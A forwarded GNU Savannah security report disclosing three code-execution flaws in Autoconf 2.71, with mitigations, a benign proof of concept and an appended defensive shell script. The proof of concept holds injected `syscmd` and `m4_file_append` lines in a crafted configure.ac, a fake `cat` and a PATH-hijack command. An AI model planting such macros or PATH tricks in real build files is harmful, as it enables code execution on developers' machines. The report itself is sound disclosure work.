Please reply via email because it appears that I am unable to access this support item through my account on https://savannah.gnu.org/support/?110961.
---------- Forwarded message ---------
From: anonymous <invalid.nore...@gnu.org>
Date: Sun, Nov 26, 2023 at 5:16 AM
Subject: [sr #110961] 3 Vulnerabilities Result in Code Execution upon running `autoconf` with crafted `configure.ac` file
To: <allypet...@gmail.com>, <bug-autoconf@gnu.org>

URL: <https://savannah.gnu.org/support/?110961>

Summary: 3 Vulnerabilities Result in Code Execution upon running `autoconf` with crafted `configure.ac` file
Group: Autoconf
Submitter: None
Submitted: Sun 26 Nov 2023 05:16:39 AM UTC
Category: None
Priority: 5 - Normal
Severity: 6 - Security
Status: None
Privacy: Private
Assigned to: None
Originator Email: allypet...@gmail.com
Open/Closed: Open
Discussion Lock: Any
Operating System: GNU/Linux

_______________________________________________________

Follow-up Comments:

-------------------------------------------------------
Date: Sun 26 Nov 2023 05:16:39 AM UTC    By: Anonymous

= Overview =

Arbitrary code execution can be obtained upon running `/usr/bin/autoconf` when a crafted `configure.ac` exploits any of the following 3 vulnerabilities:

* Command injection in M4sugar due to lack of input sanitization (CWE-78).
* `cat` command being executed without absolute path in M4sugar, leaving it vulnerable to an untrusted PATH (CWE-427).
* Invocation of arbitrary m4 macros in `configure.ac`.

*Date*: 11/25/2023
*Researcher*: Ally Petitt
*Product Tested*: Autoconf v2.71 (it is highly likely this still exists in more recent releases)
*Impact*: Remote code execution that leads to the loss of availability, confidentiality, and integrity of the system. In certain cases it can also lead to privilege escalation.

= Technical Details =

== M4sugar - Multiple Vulnerabilities ==

The `m4_file_append` macro is defined starting on line 3272 of `lib/m4sugar/m4sugar.m4`.

    m4_define([m4_file_append],
    [m4_syscmd([cat >>$1 <<_m4eof
    $2
    _m4eof
    ])])

This macro has 2 vulnerabilities.
Proof-of-Concept examples of each will be shown in the "PoC" section to provide both clarification and an easy way to validate the issues.

1. The first vulnerability is that `cat` is called without an absolute path, leaving it prone to modification of the $PATH environmental variable. A privileged user on the system may set the $PATH to point to a directory they control containing a malicious executable called `cat`. In scenarios where `autoconf` has an SUID bit set or can otherwise be run with elevated privileges, this can lead to privilege escalation.

   *Mitigation*: Replace "cat" with "/usr/bin/cat" in the definition of `m4_file_append`.

2. The arguments passed to `m4_file_append` are not sanitized before being passed into `m4_syscmd`. This means that hackers can directly insert malicious code as an argument to the macro and it will be executed when `autoconf` is run!

   *Mitigation*: If possible, implement a more secure way to append to a file that does not involve running shell commands. I wish I could provide more guidance here but I am not very proficient in m4. In the case that this is not feasible, treat `$1` and `$2` as untrusted input and sanitize them.

== Autoconf - Invocation of Arbitrary M4 Macros ==

Autoconf appears to execute m4 macros directly through the `configure.ac` file. Without any sanitization, adversaries are able to invoke arbitrary macros including `syscmd` and the aforementioned vulnerable `m4_file_append`. This can lead to the execution of code upon running `autoconf`. An example will be shown in the "PoC" section below.

It is worth noting that while executing macros is part of Autoconf's functionality, I did not find evidence that the arbitrary execution of commands was an intentional part of this design. As such, the lack of restriction on the macros that can be called results in a larger attack surface that can be taken advantage of by hackers.

*Mitigation*: Enforce a whitelist of macros that are able to be executed from `configure.ac`.
= PoC =

This Proof-of-Concept involves the creation of 4 files within the same directory. The contents of these files are the following (file names are commented at the top of each code block):

    # configure.ac
    AC_INIT([hello], [1.0])
    AC_CONFIG_SRCDIR([hello.c])
    AC_CONFIG_AUX_DIR([build-aux])
    AC_PROG_CC

    # Trigger the vulnerabilities by writing to a file called `vulns`
    syscmd(echo vuln1 > vulns)                    # vuln1
    m4_file_append(test, `echo vuln2 >> vulns`)   # vuln2 and vuln3

    AC_CONFIG_FILES([Makefile])
    AC_OUTPUT

    # Makefile.am
    bin_PROGRAMS = hello
    hello_SOURCES = hello.c

    # hello.c
    #include <stdio.h>

    int main(int argc, char** argv) {
        printf("hello world!\n");
        return 0;
    }

    # cat
    #!/bin/bash
    echo vuln3 >> vulns

The resulting directory listing should be the following:

    $ ls
    cat  configure.ac  hello.c  Makefile.am

Once the files are verified to be correct, the 3 vulnerabilities can be exploited by running the command below.

    $ export PATH=$(pwd):$PATH && autoconf

A new file will be created called `vulns`. Each vulnerability that was exploited wrote to this file to create the content below.

    vuln1
    vuln2
    vuln3

Note that exploiting vulnerabilities 1 and 2 (the vulnerabilities that write "vuln1" and "vuln2" to the `vulns` file, respectively) does not require the $PATH environmental variable to be set and can simply be exploited with the below command.

    $ autoconf --force

These files are also included as a zip archive attached with this bug report.

_______________________________________________________

File Attachments:

-------------------------------------------------------
Date: Sun 26 Nov 2023 05:16:39 AM UTC    Name: poc.zip    Size: 1KiB    By: None
<http://savannah.gnu.org/support/download.php?file_id=55355>
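Added here as a defender-side illustration, not code from the report, the attached archive, or Autoconf itself: a POSIX sh stand-in for the `m4_file_append` pattern that keeps the body argument as data (so the backticked payload from the PoC is written literally rather than run), plus a resolver that refuses to proceed when an unqualified `cat` would be found outside the system directories (the CWE-427 condition described above). All helper names are hypothetical.

```shell
#!/bin/sh
# Added example, not code from the report or from Autoconf. Helper names are
# hypothetical; assumes POSIX sh. safe_file_append is a hardened stand-in for
# the m4_file_append pattern; check_cat_trusted models the CWE-427 check.

# Append BODY to TARGET without either argument reaching the shell parser:
# TARGET must be a plain filename, BODY goes to the printf builtin as data, so
# backticks or $(...) are written literally and no external `cat` is run.
safe_file_append() {
    target=$1
    body=$2
    case "$target" in
        ''|-*|*/*|*[!A-Za-z0-9._-]*) echo "refusing target: $target" >&2; return 1 ;;
    esac
    printf '%s\n' "$body" >> "$target"
}

# First executable NAME along PATHSTRING; an empty entry means ".".
resolve_in_path() {
    rest="$2:"
    while [ -n "$rest" ]; do
        entry=${rest%%:*}; rest=${rest#*:}
        if [ -z "$entry" ]; then entry=.; fi
        if [ -f "$entry/$1" ] && [ -x "$entry/$1" ]; then
            printf '%s\n' "$entry/$1"; return 0
        fi
    done
    return 1
}

# Return 0 only if an unqualified `cat` would resolve to a system copy.
check_cat_trusted() {
    found=$(resolve_in_path cat "${1-$PATH}") || return 1
    case "$found" in /bin/cat|/usr/bin/cat) return 0 ;; esac
    echo "untrusted cat: $found" >&2
    return 1
}

# Demo on constructed input mirroring the report's PoC: the body argument,
# and a directory holding a stand-in `cat` (an empty executable file).
demo_dir=$(mktemp -d)
( cd "$demo_dir" && safe_file_append test '`echo vuln2 >> vulns`' )
if [ ! -e "$demo_dir/vulns" ]; then echo "body stored as data, not executed"; fi
: > "$demo_dir/cat"; chmod +x "$demo_dir/cat"
check_cat_trusted "$demo_dir:/usr/bin:/bin" || echo "would refuse to run autoconf"
rm -rf "$demo_dir"
```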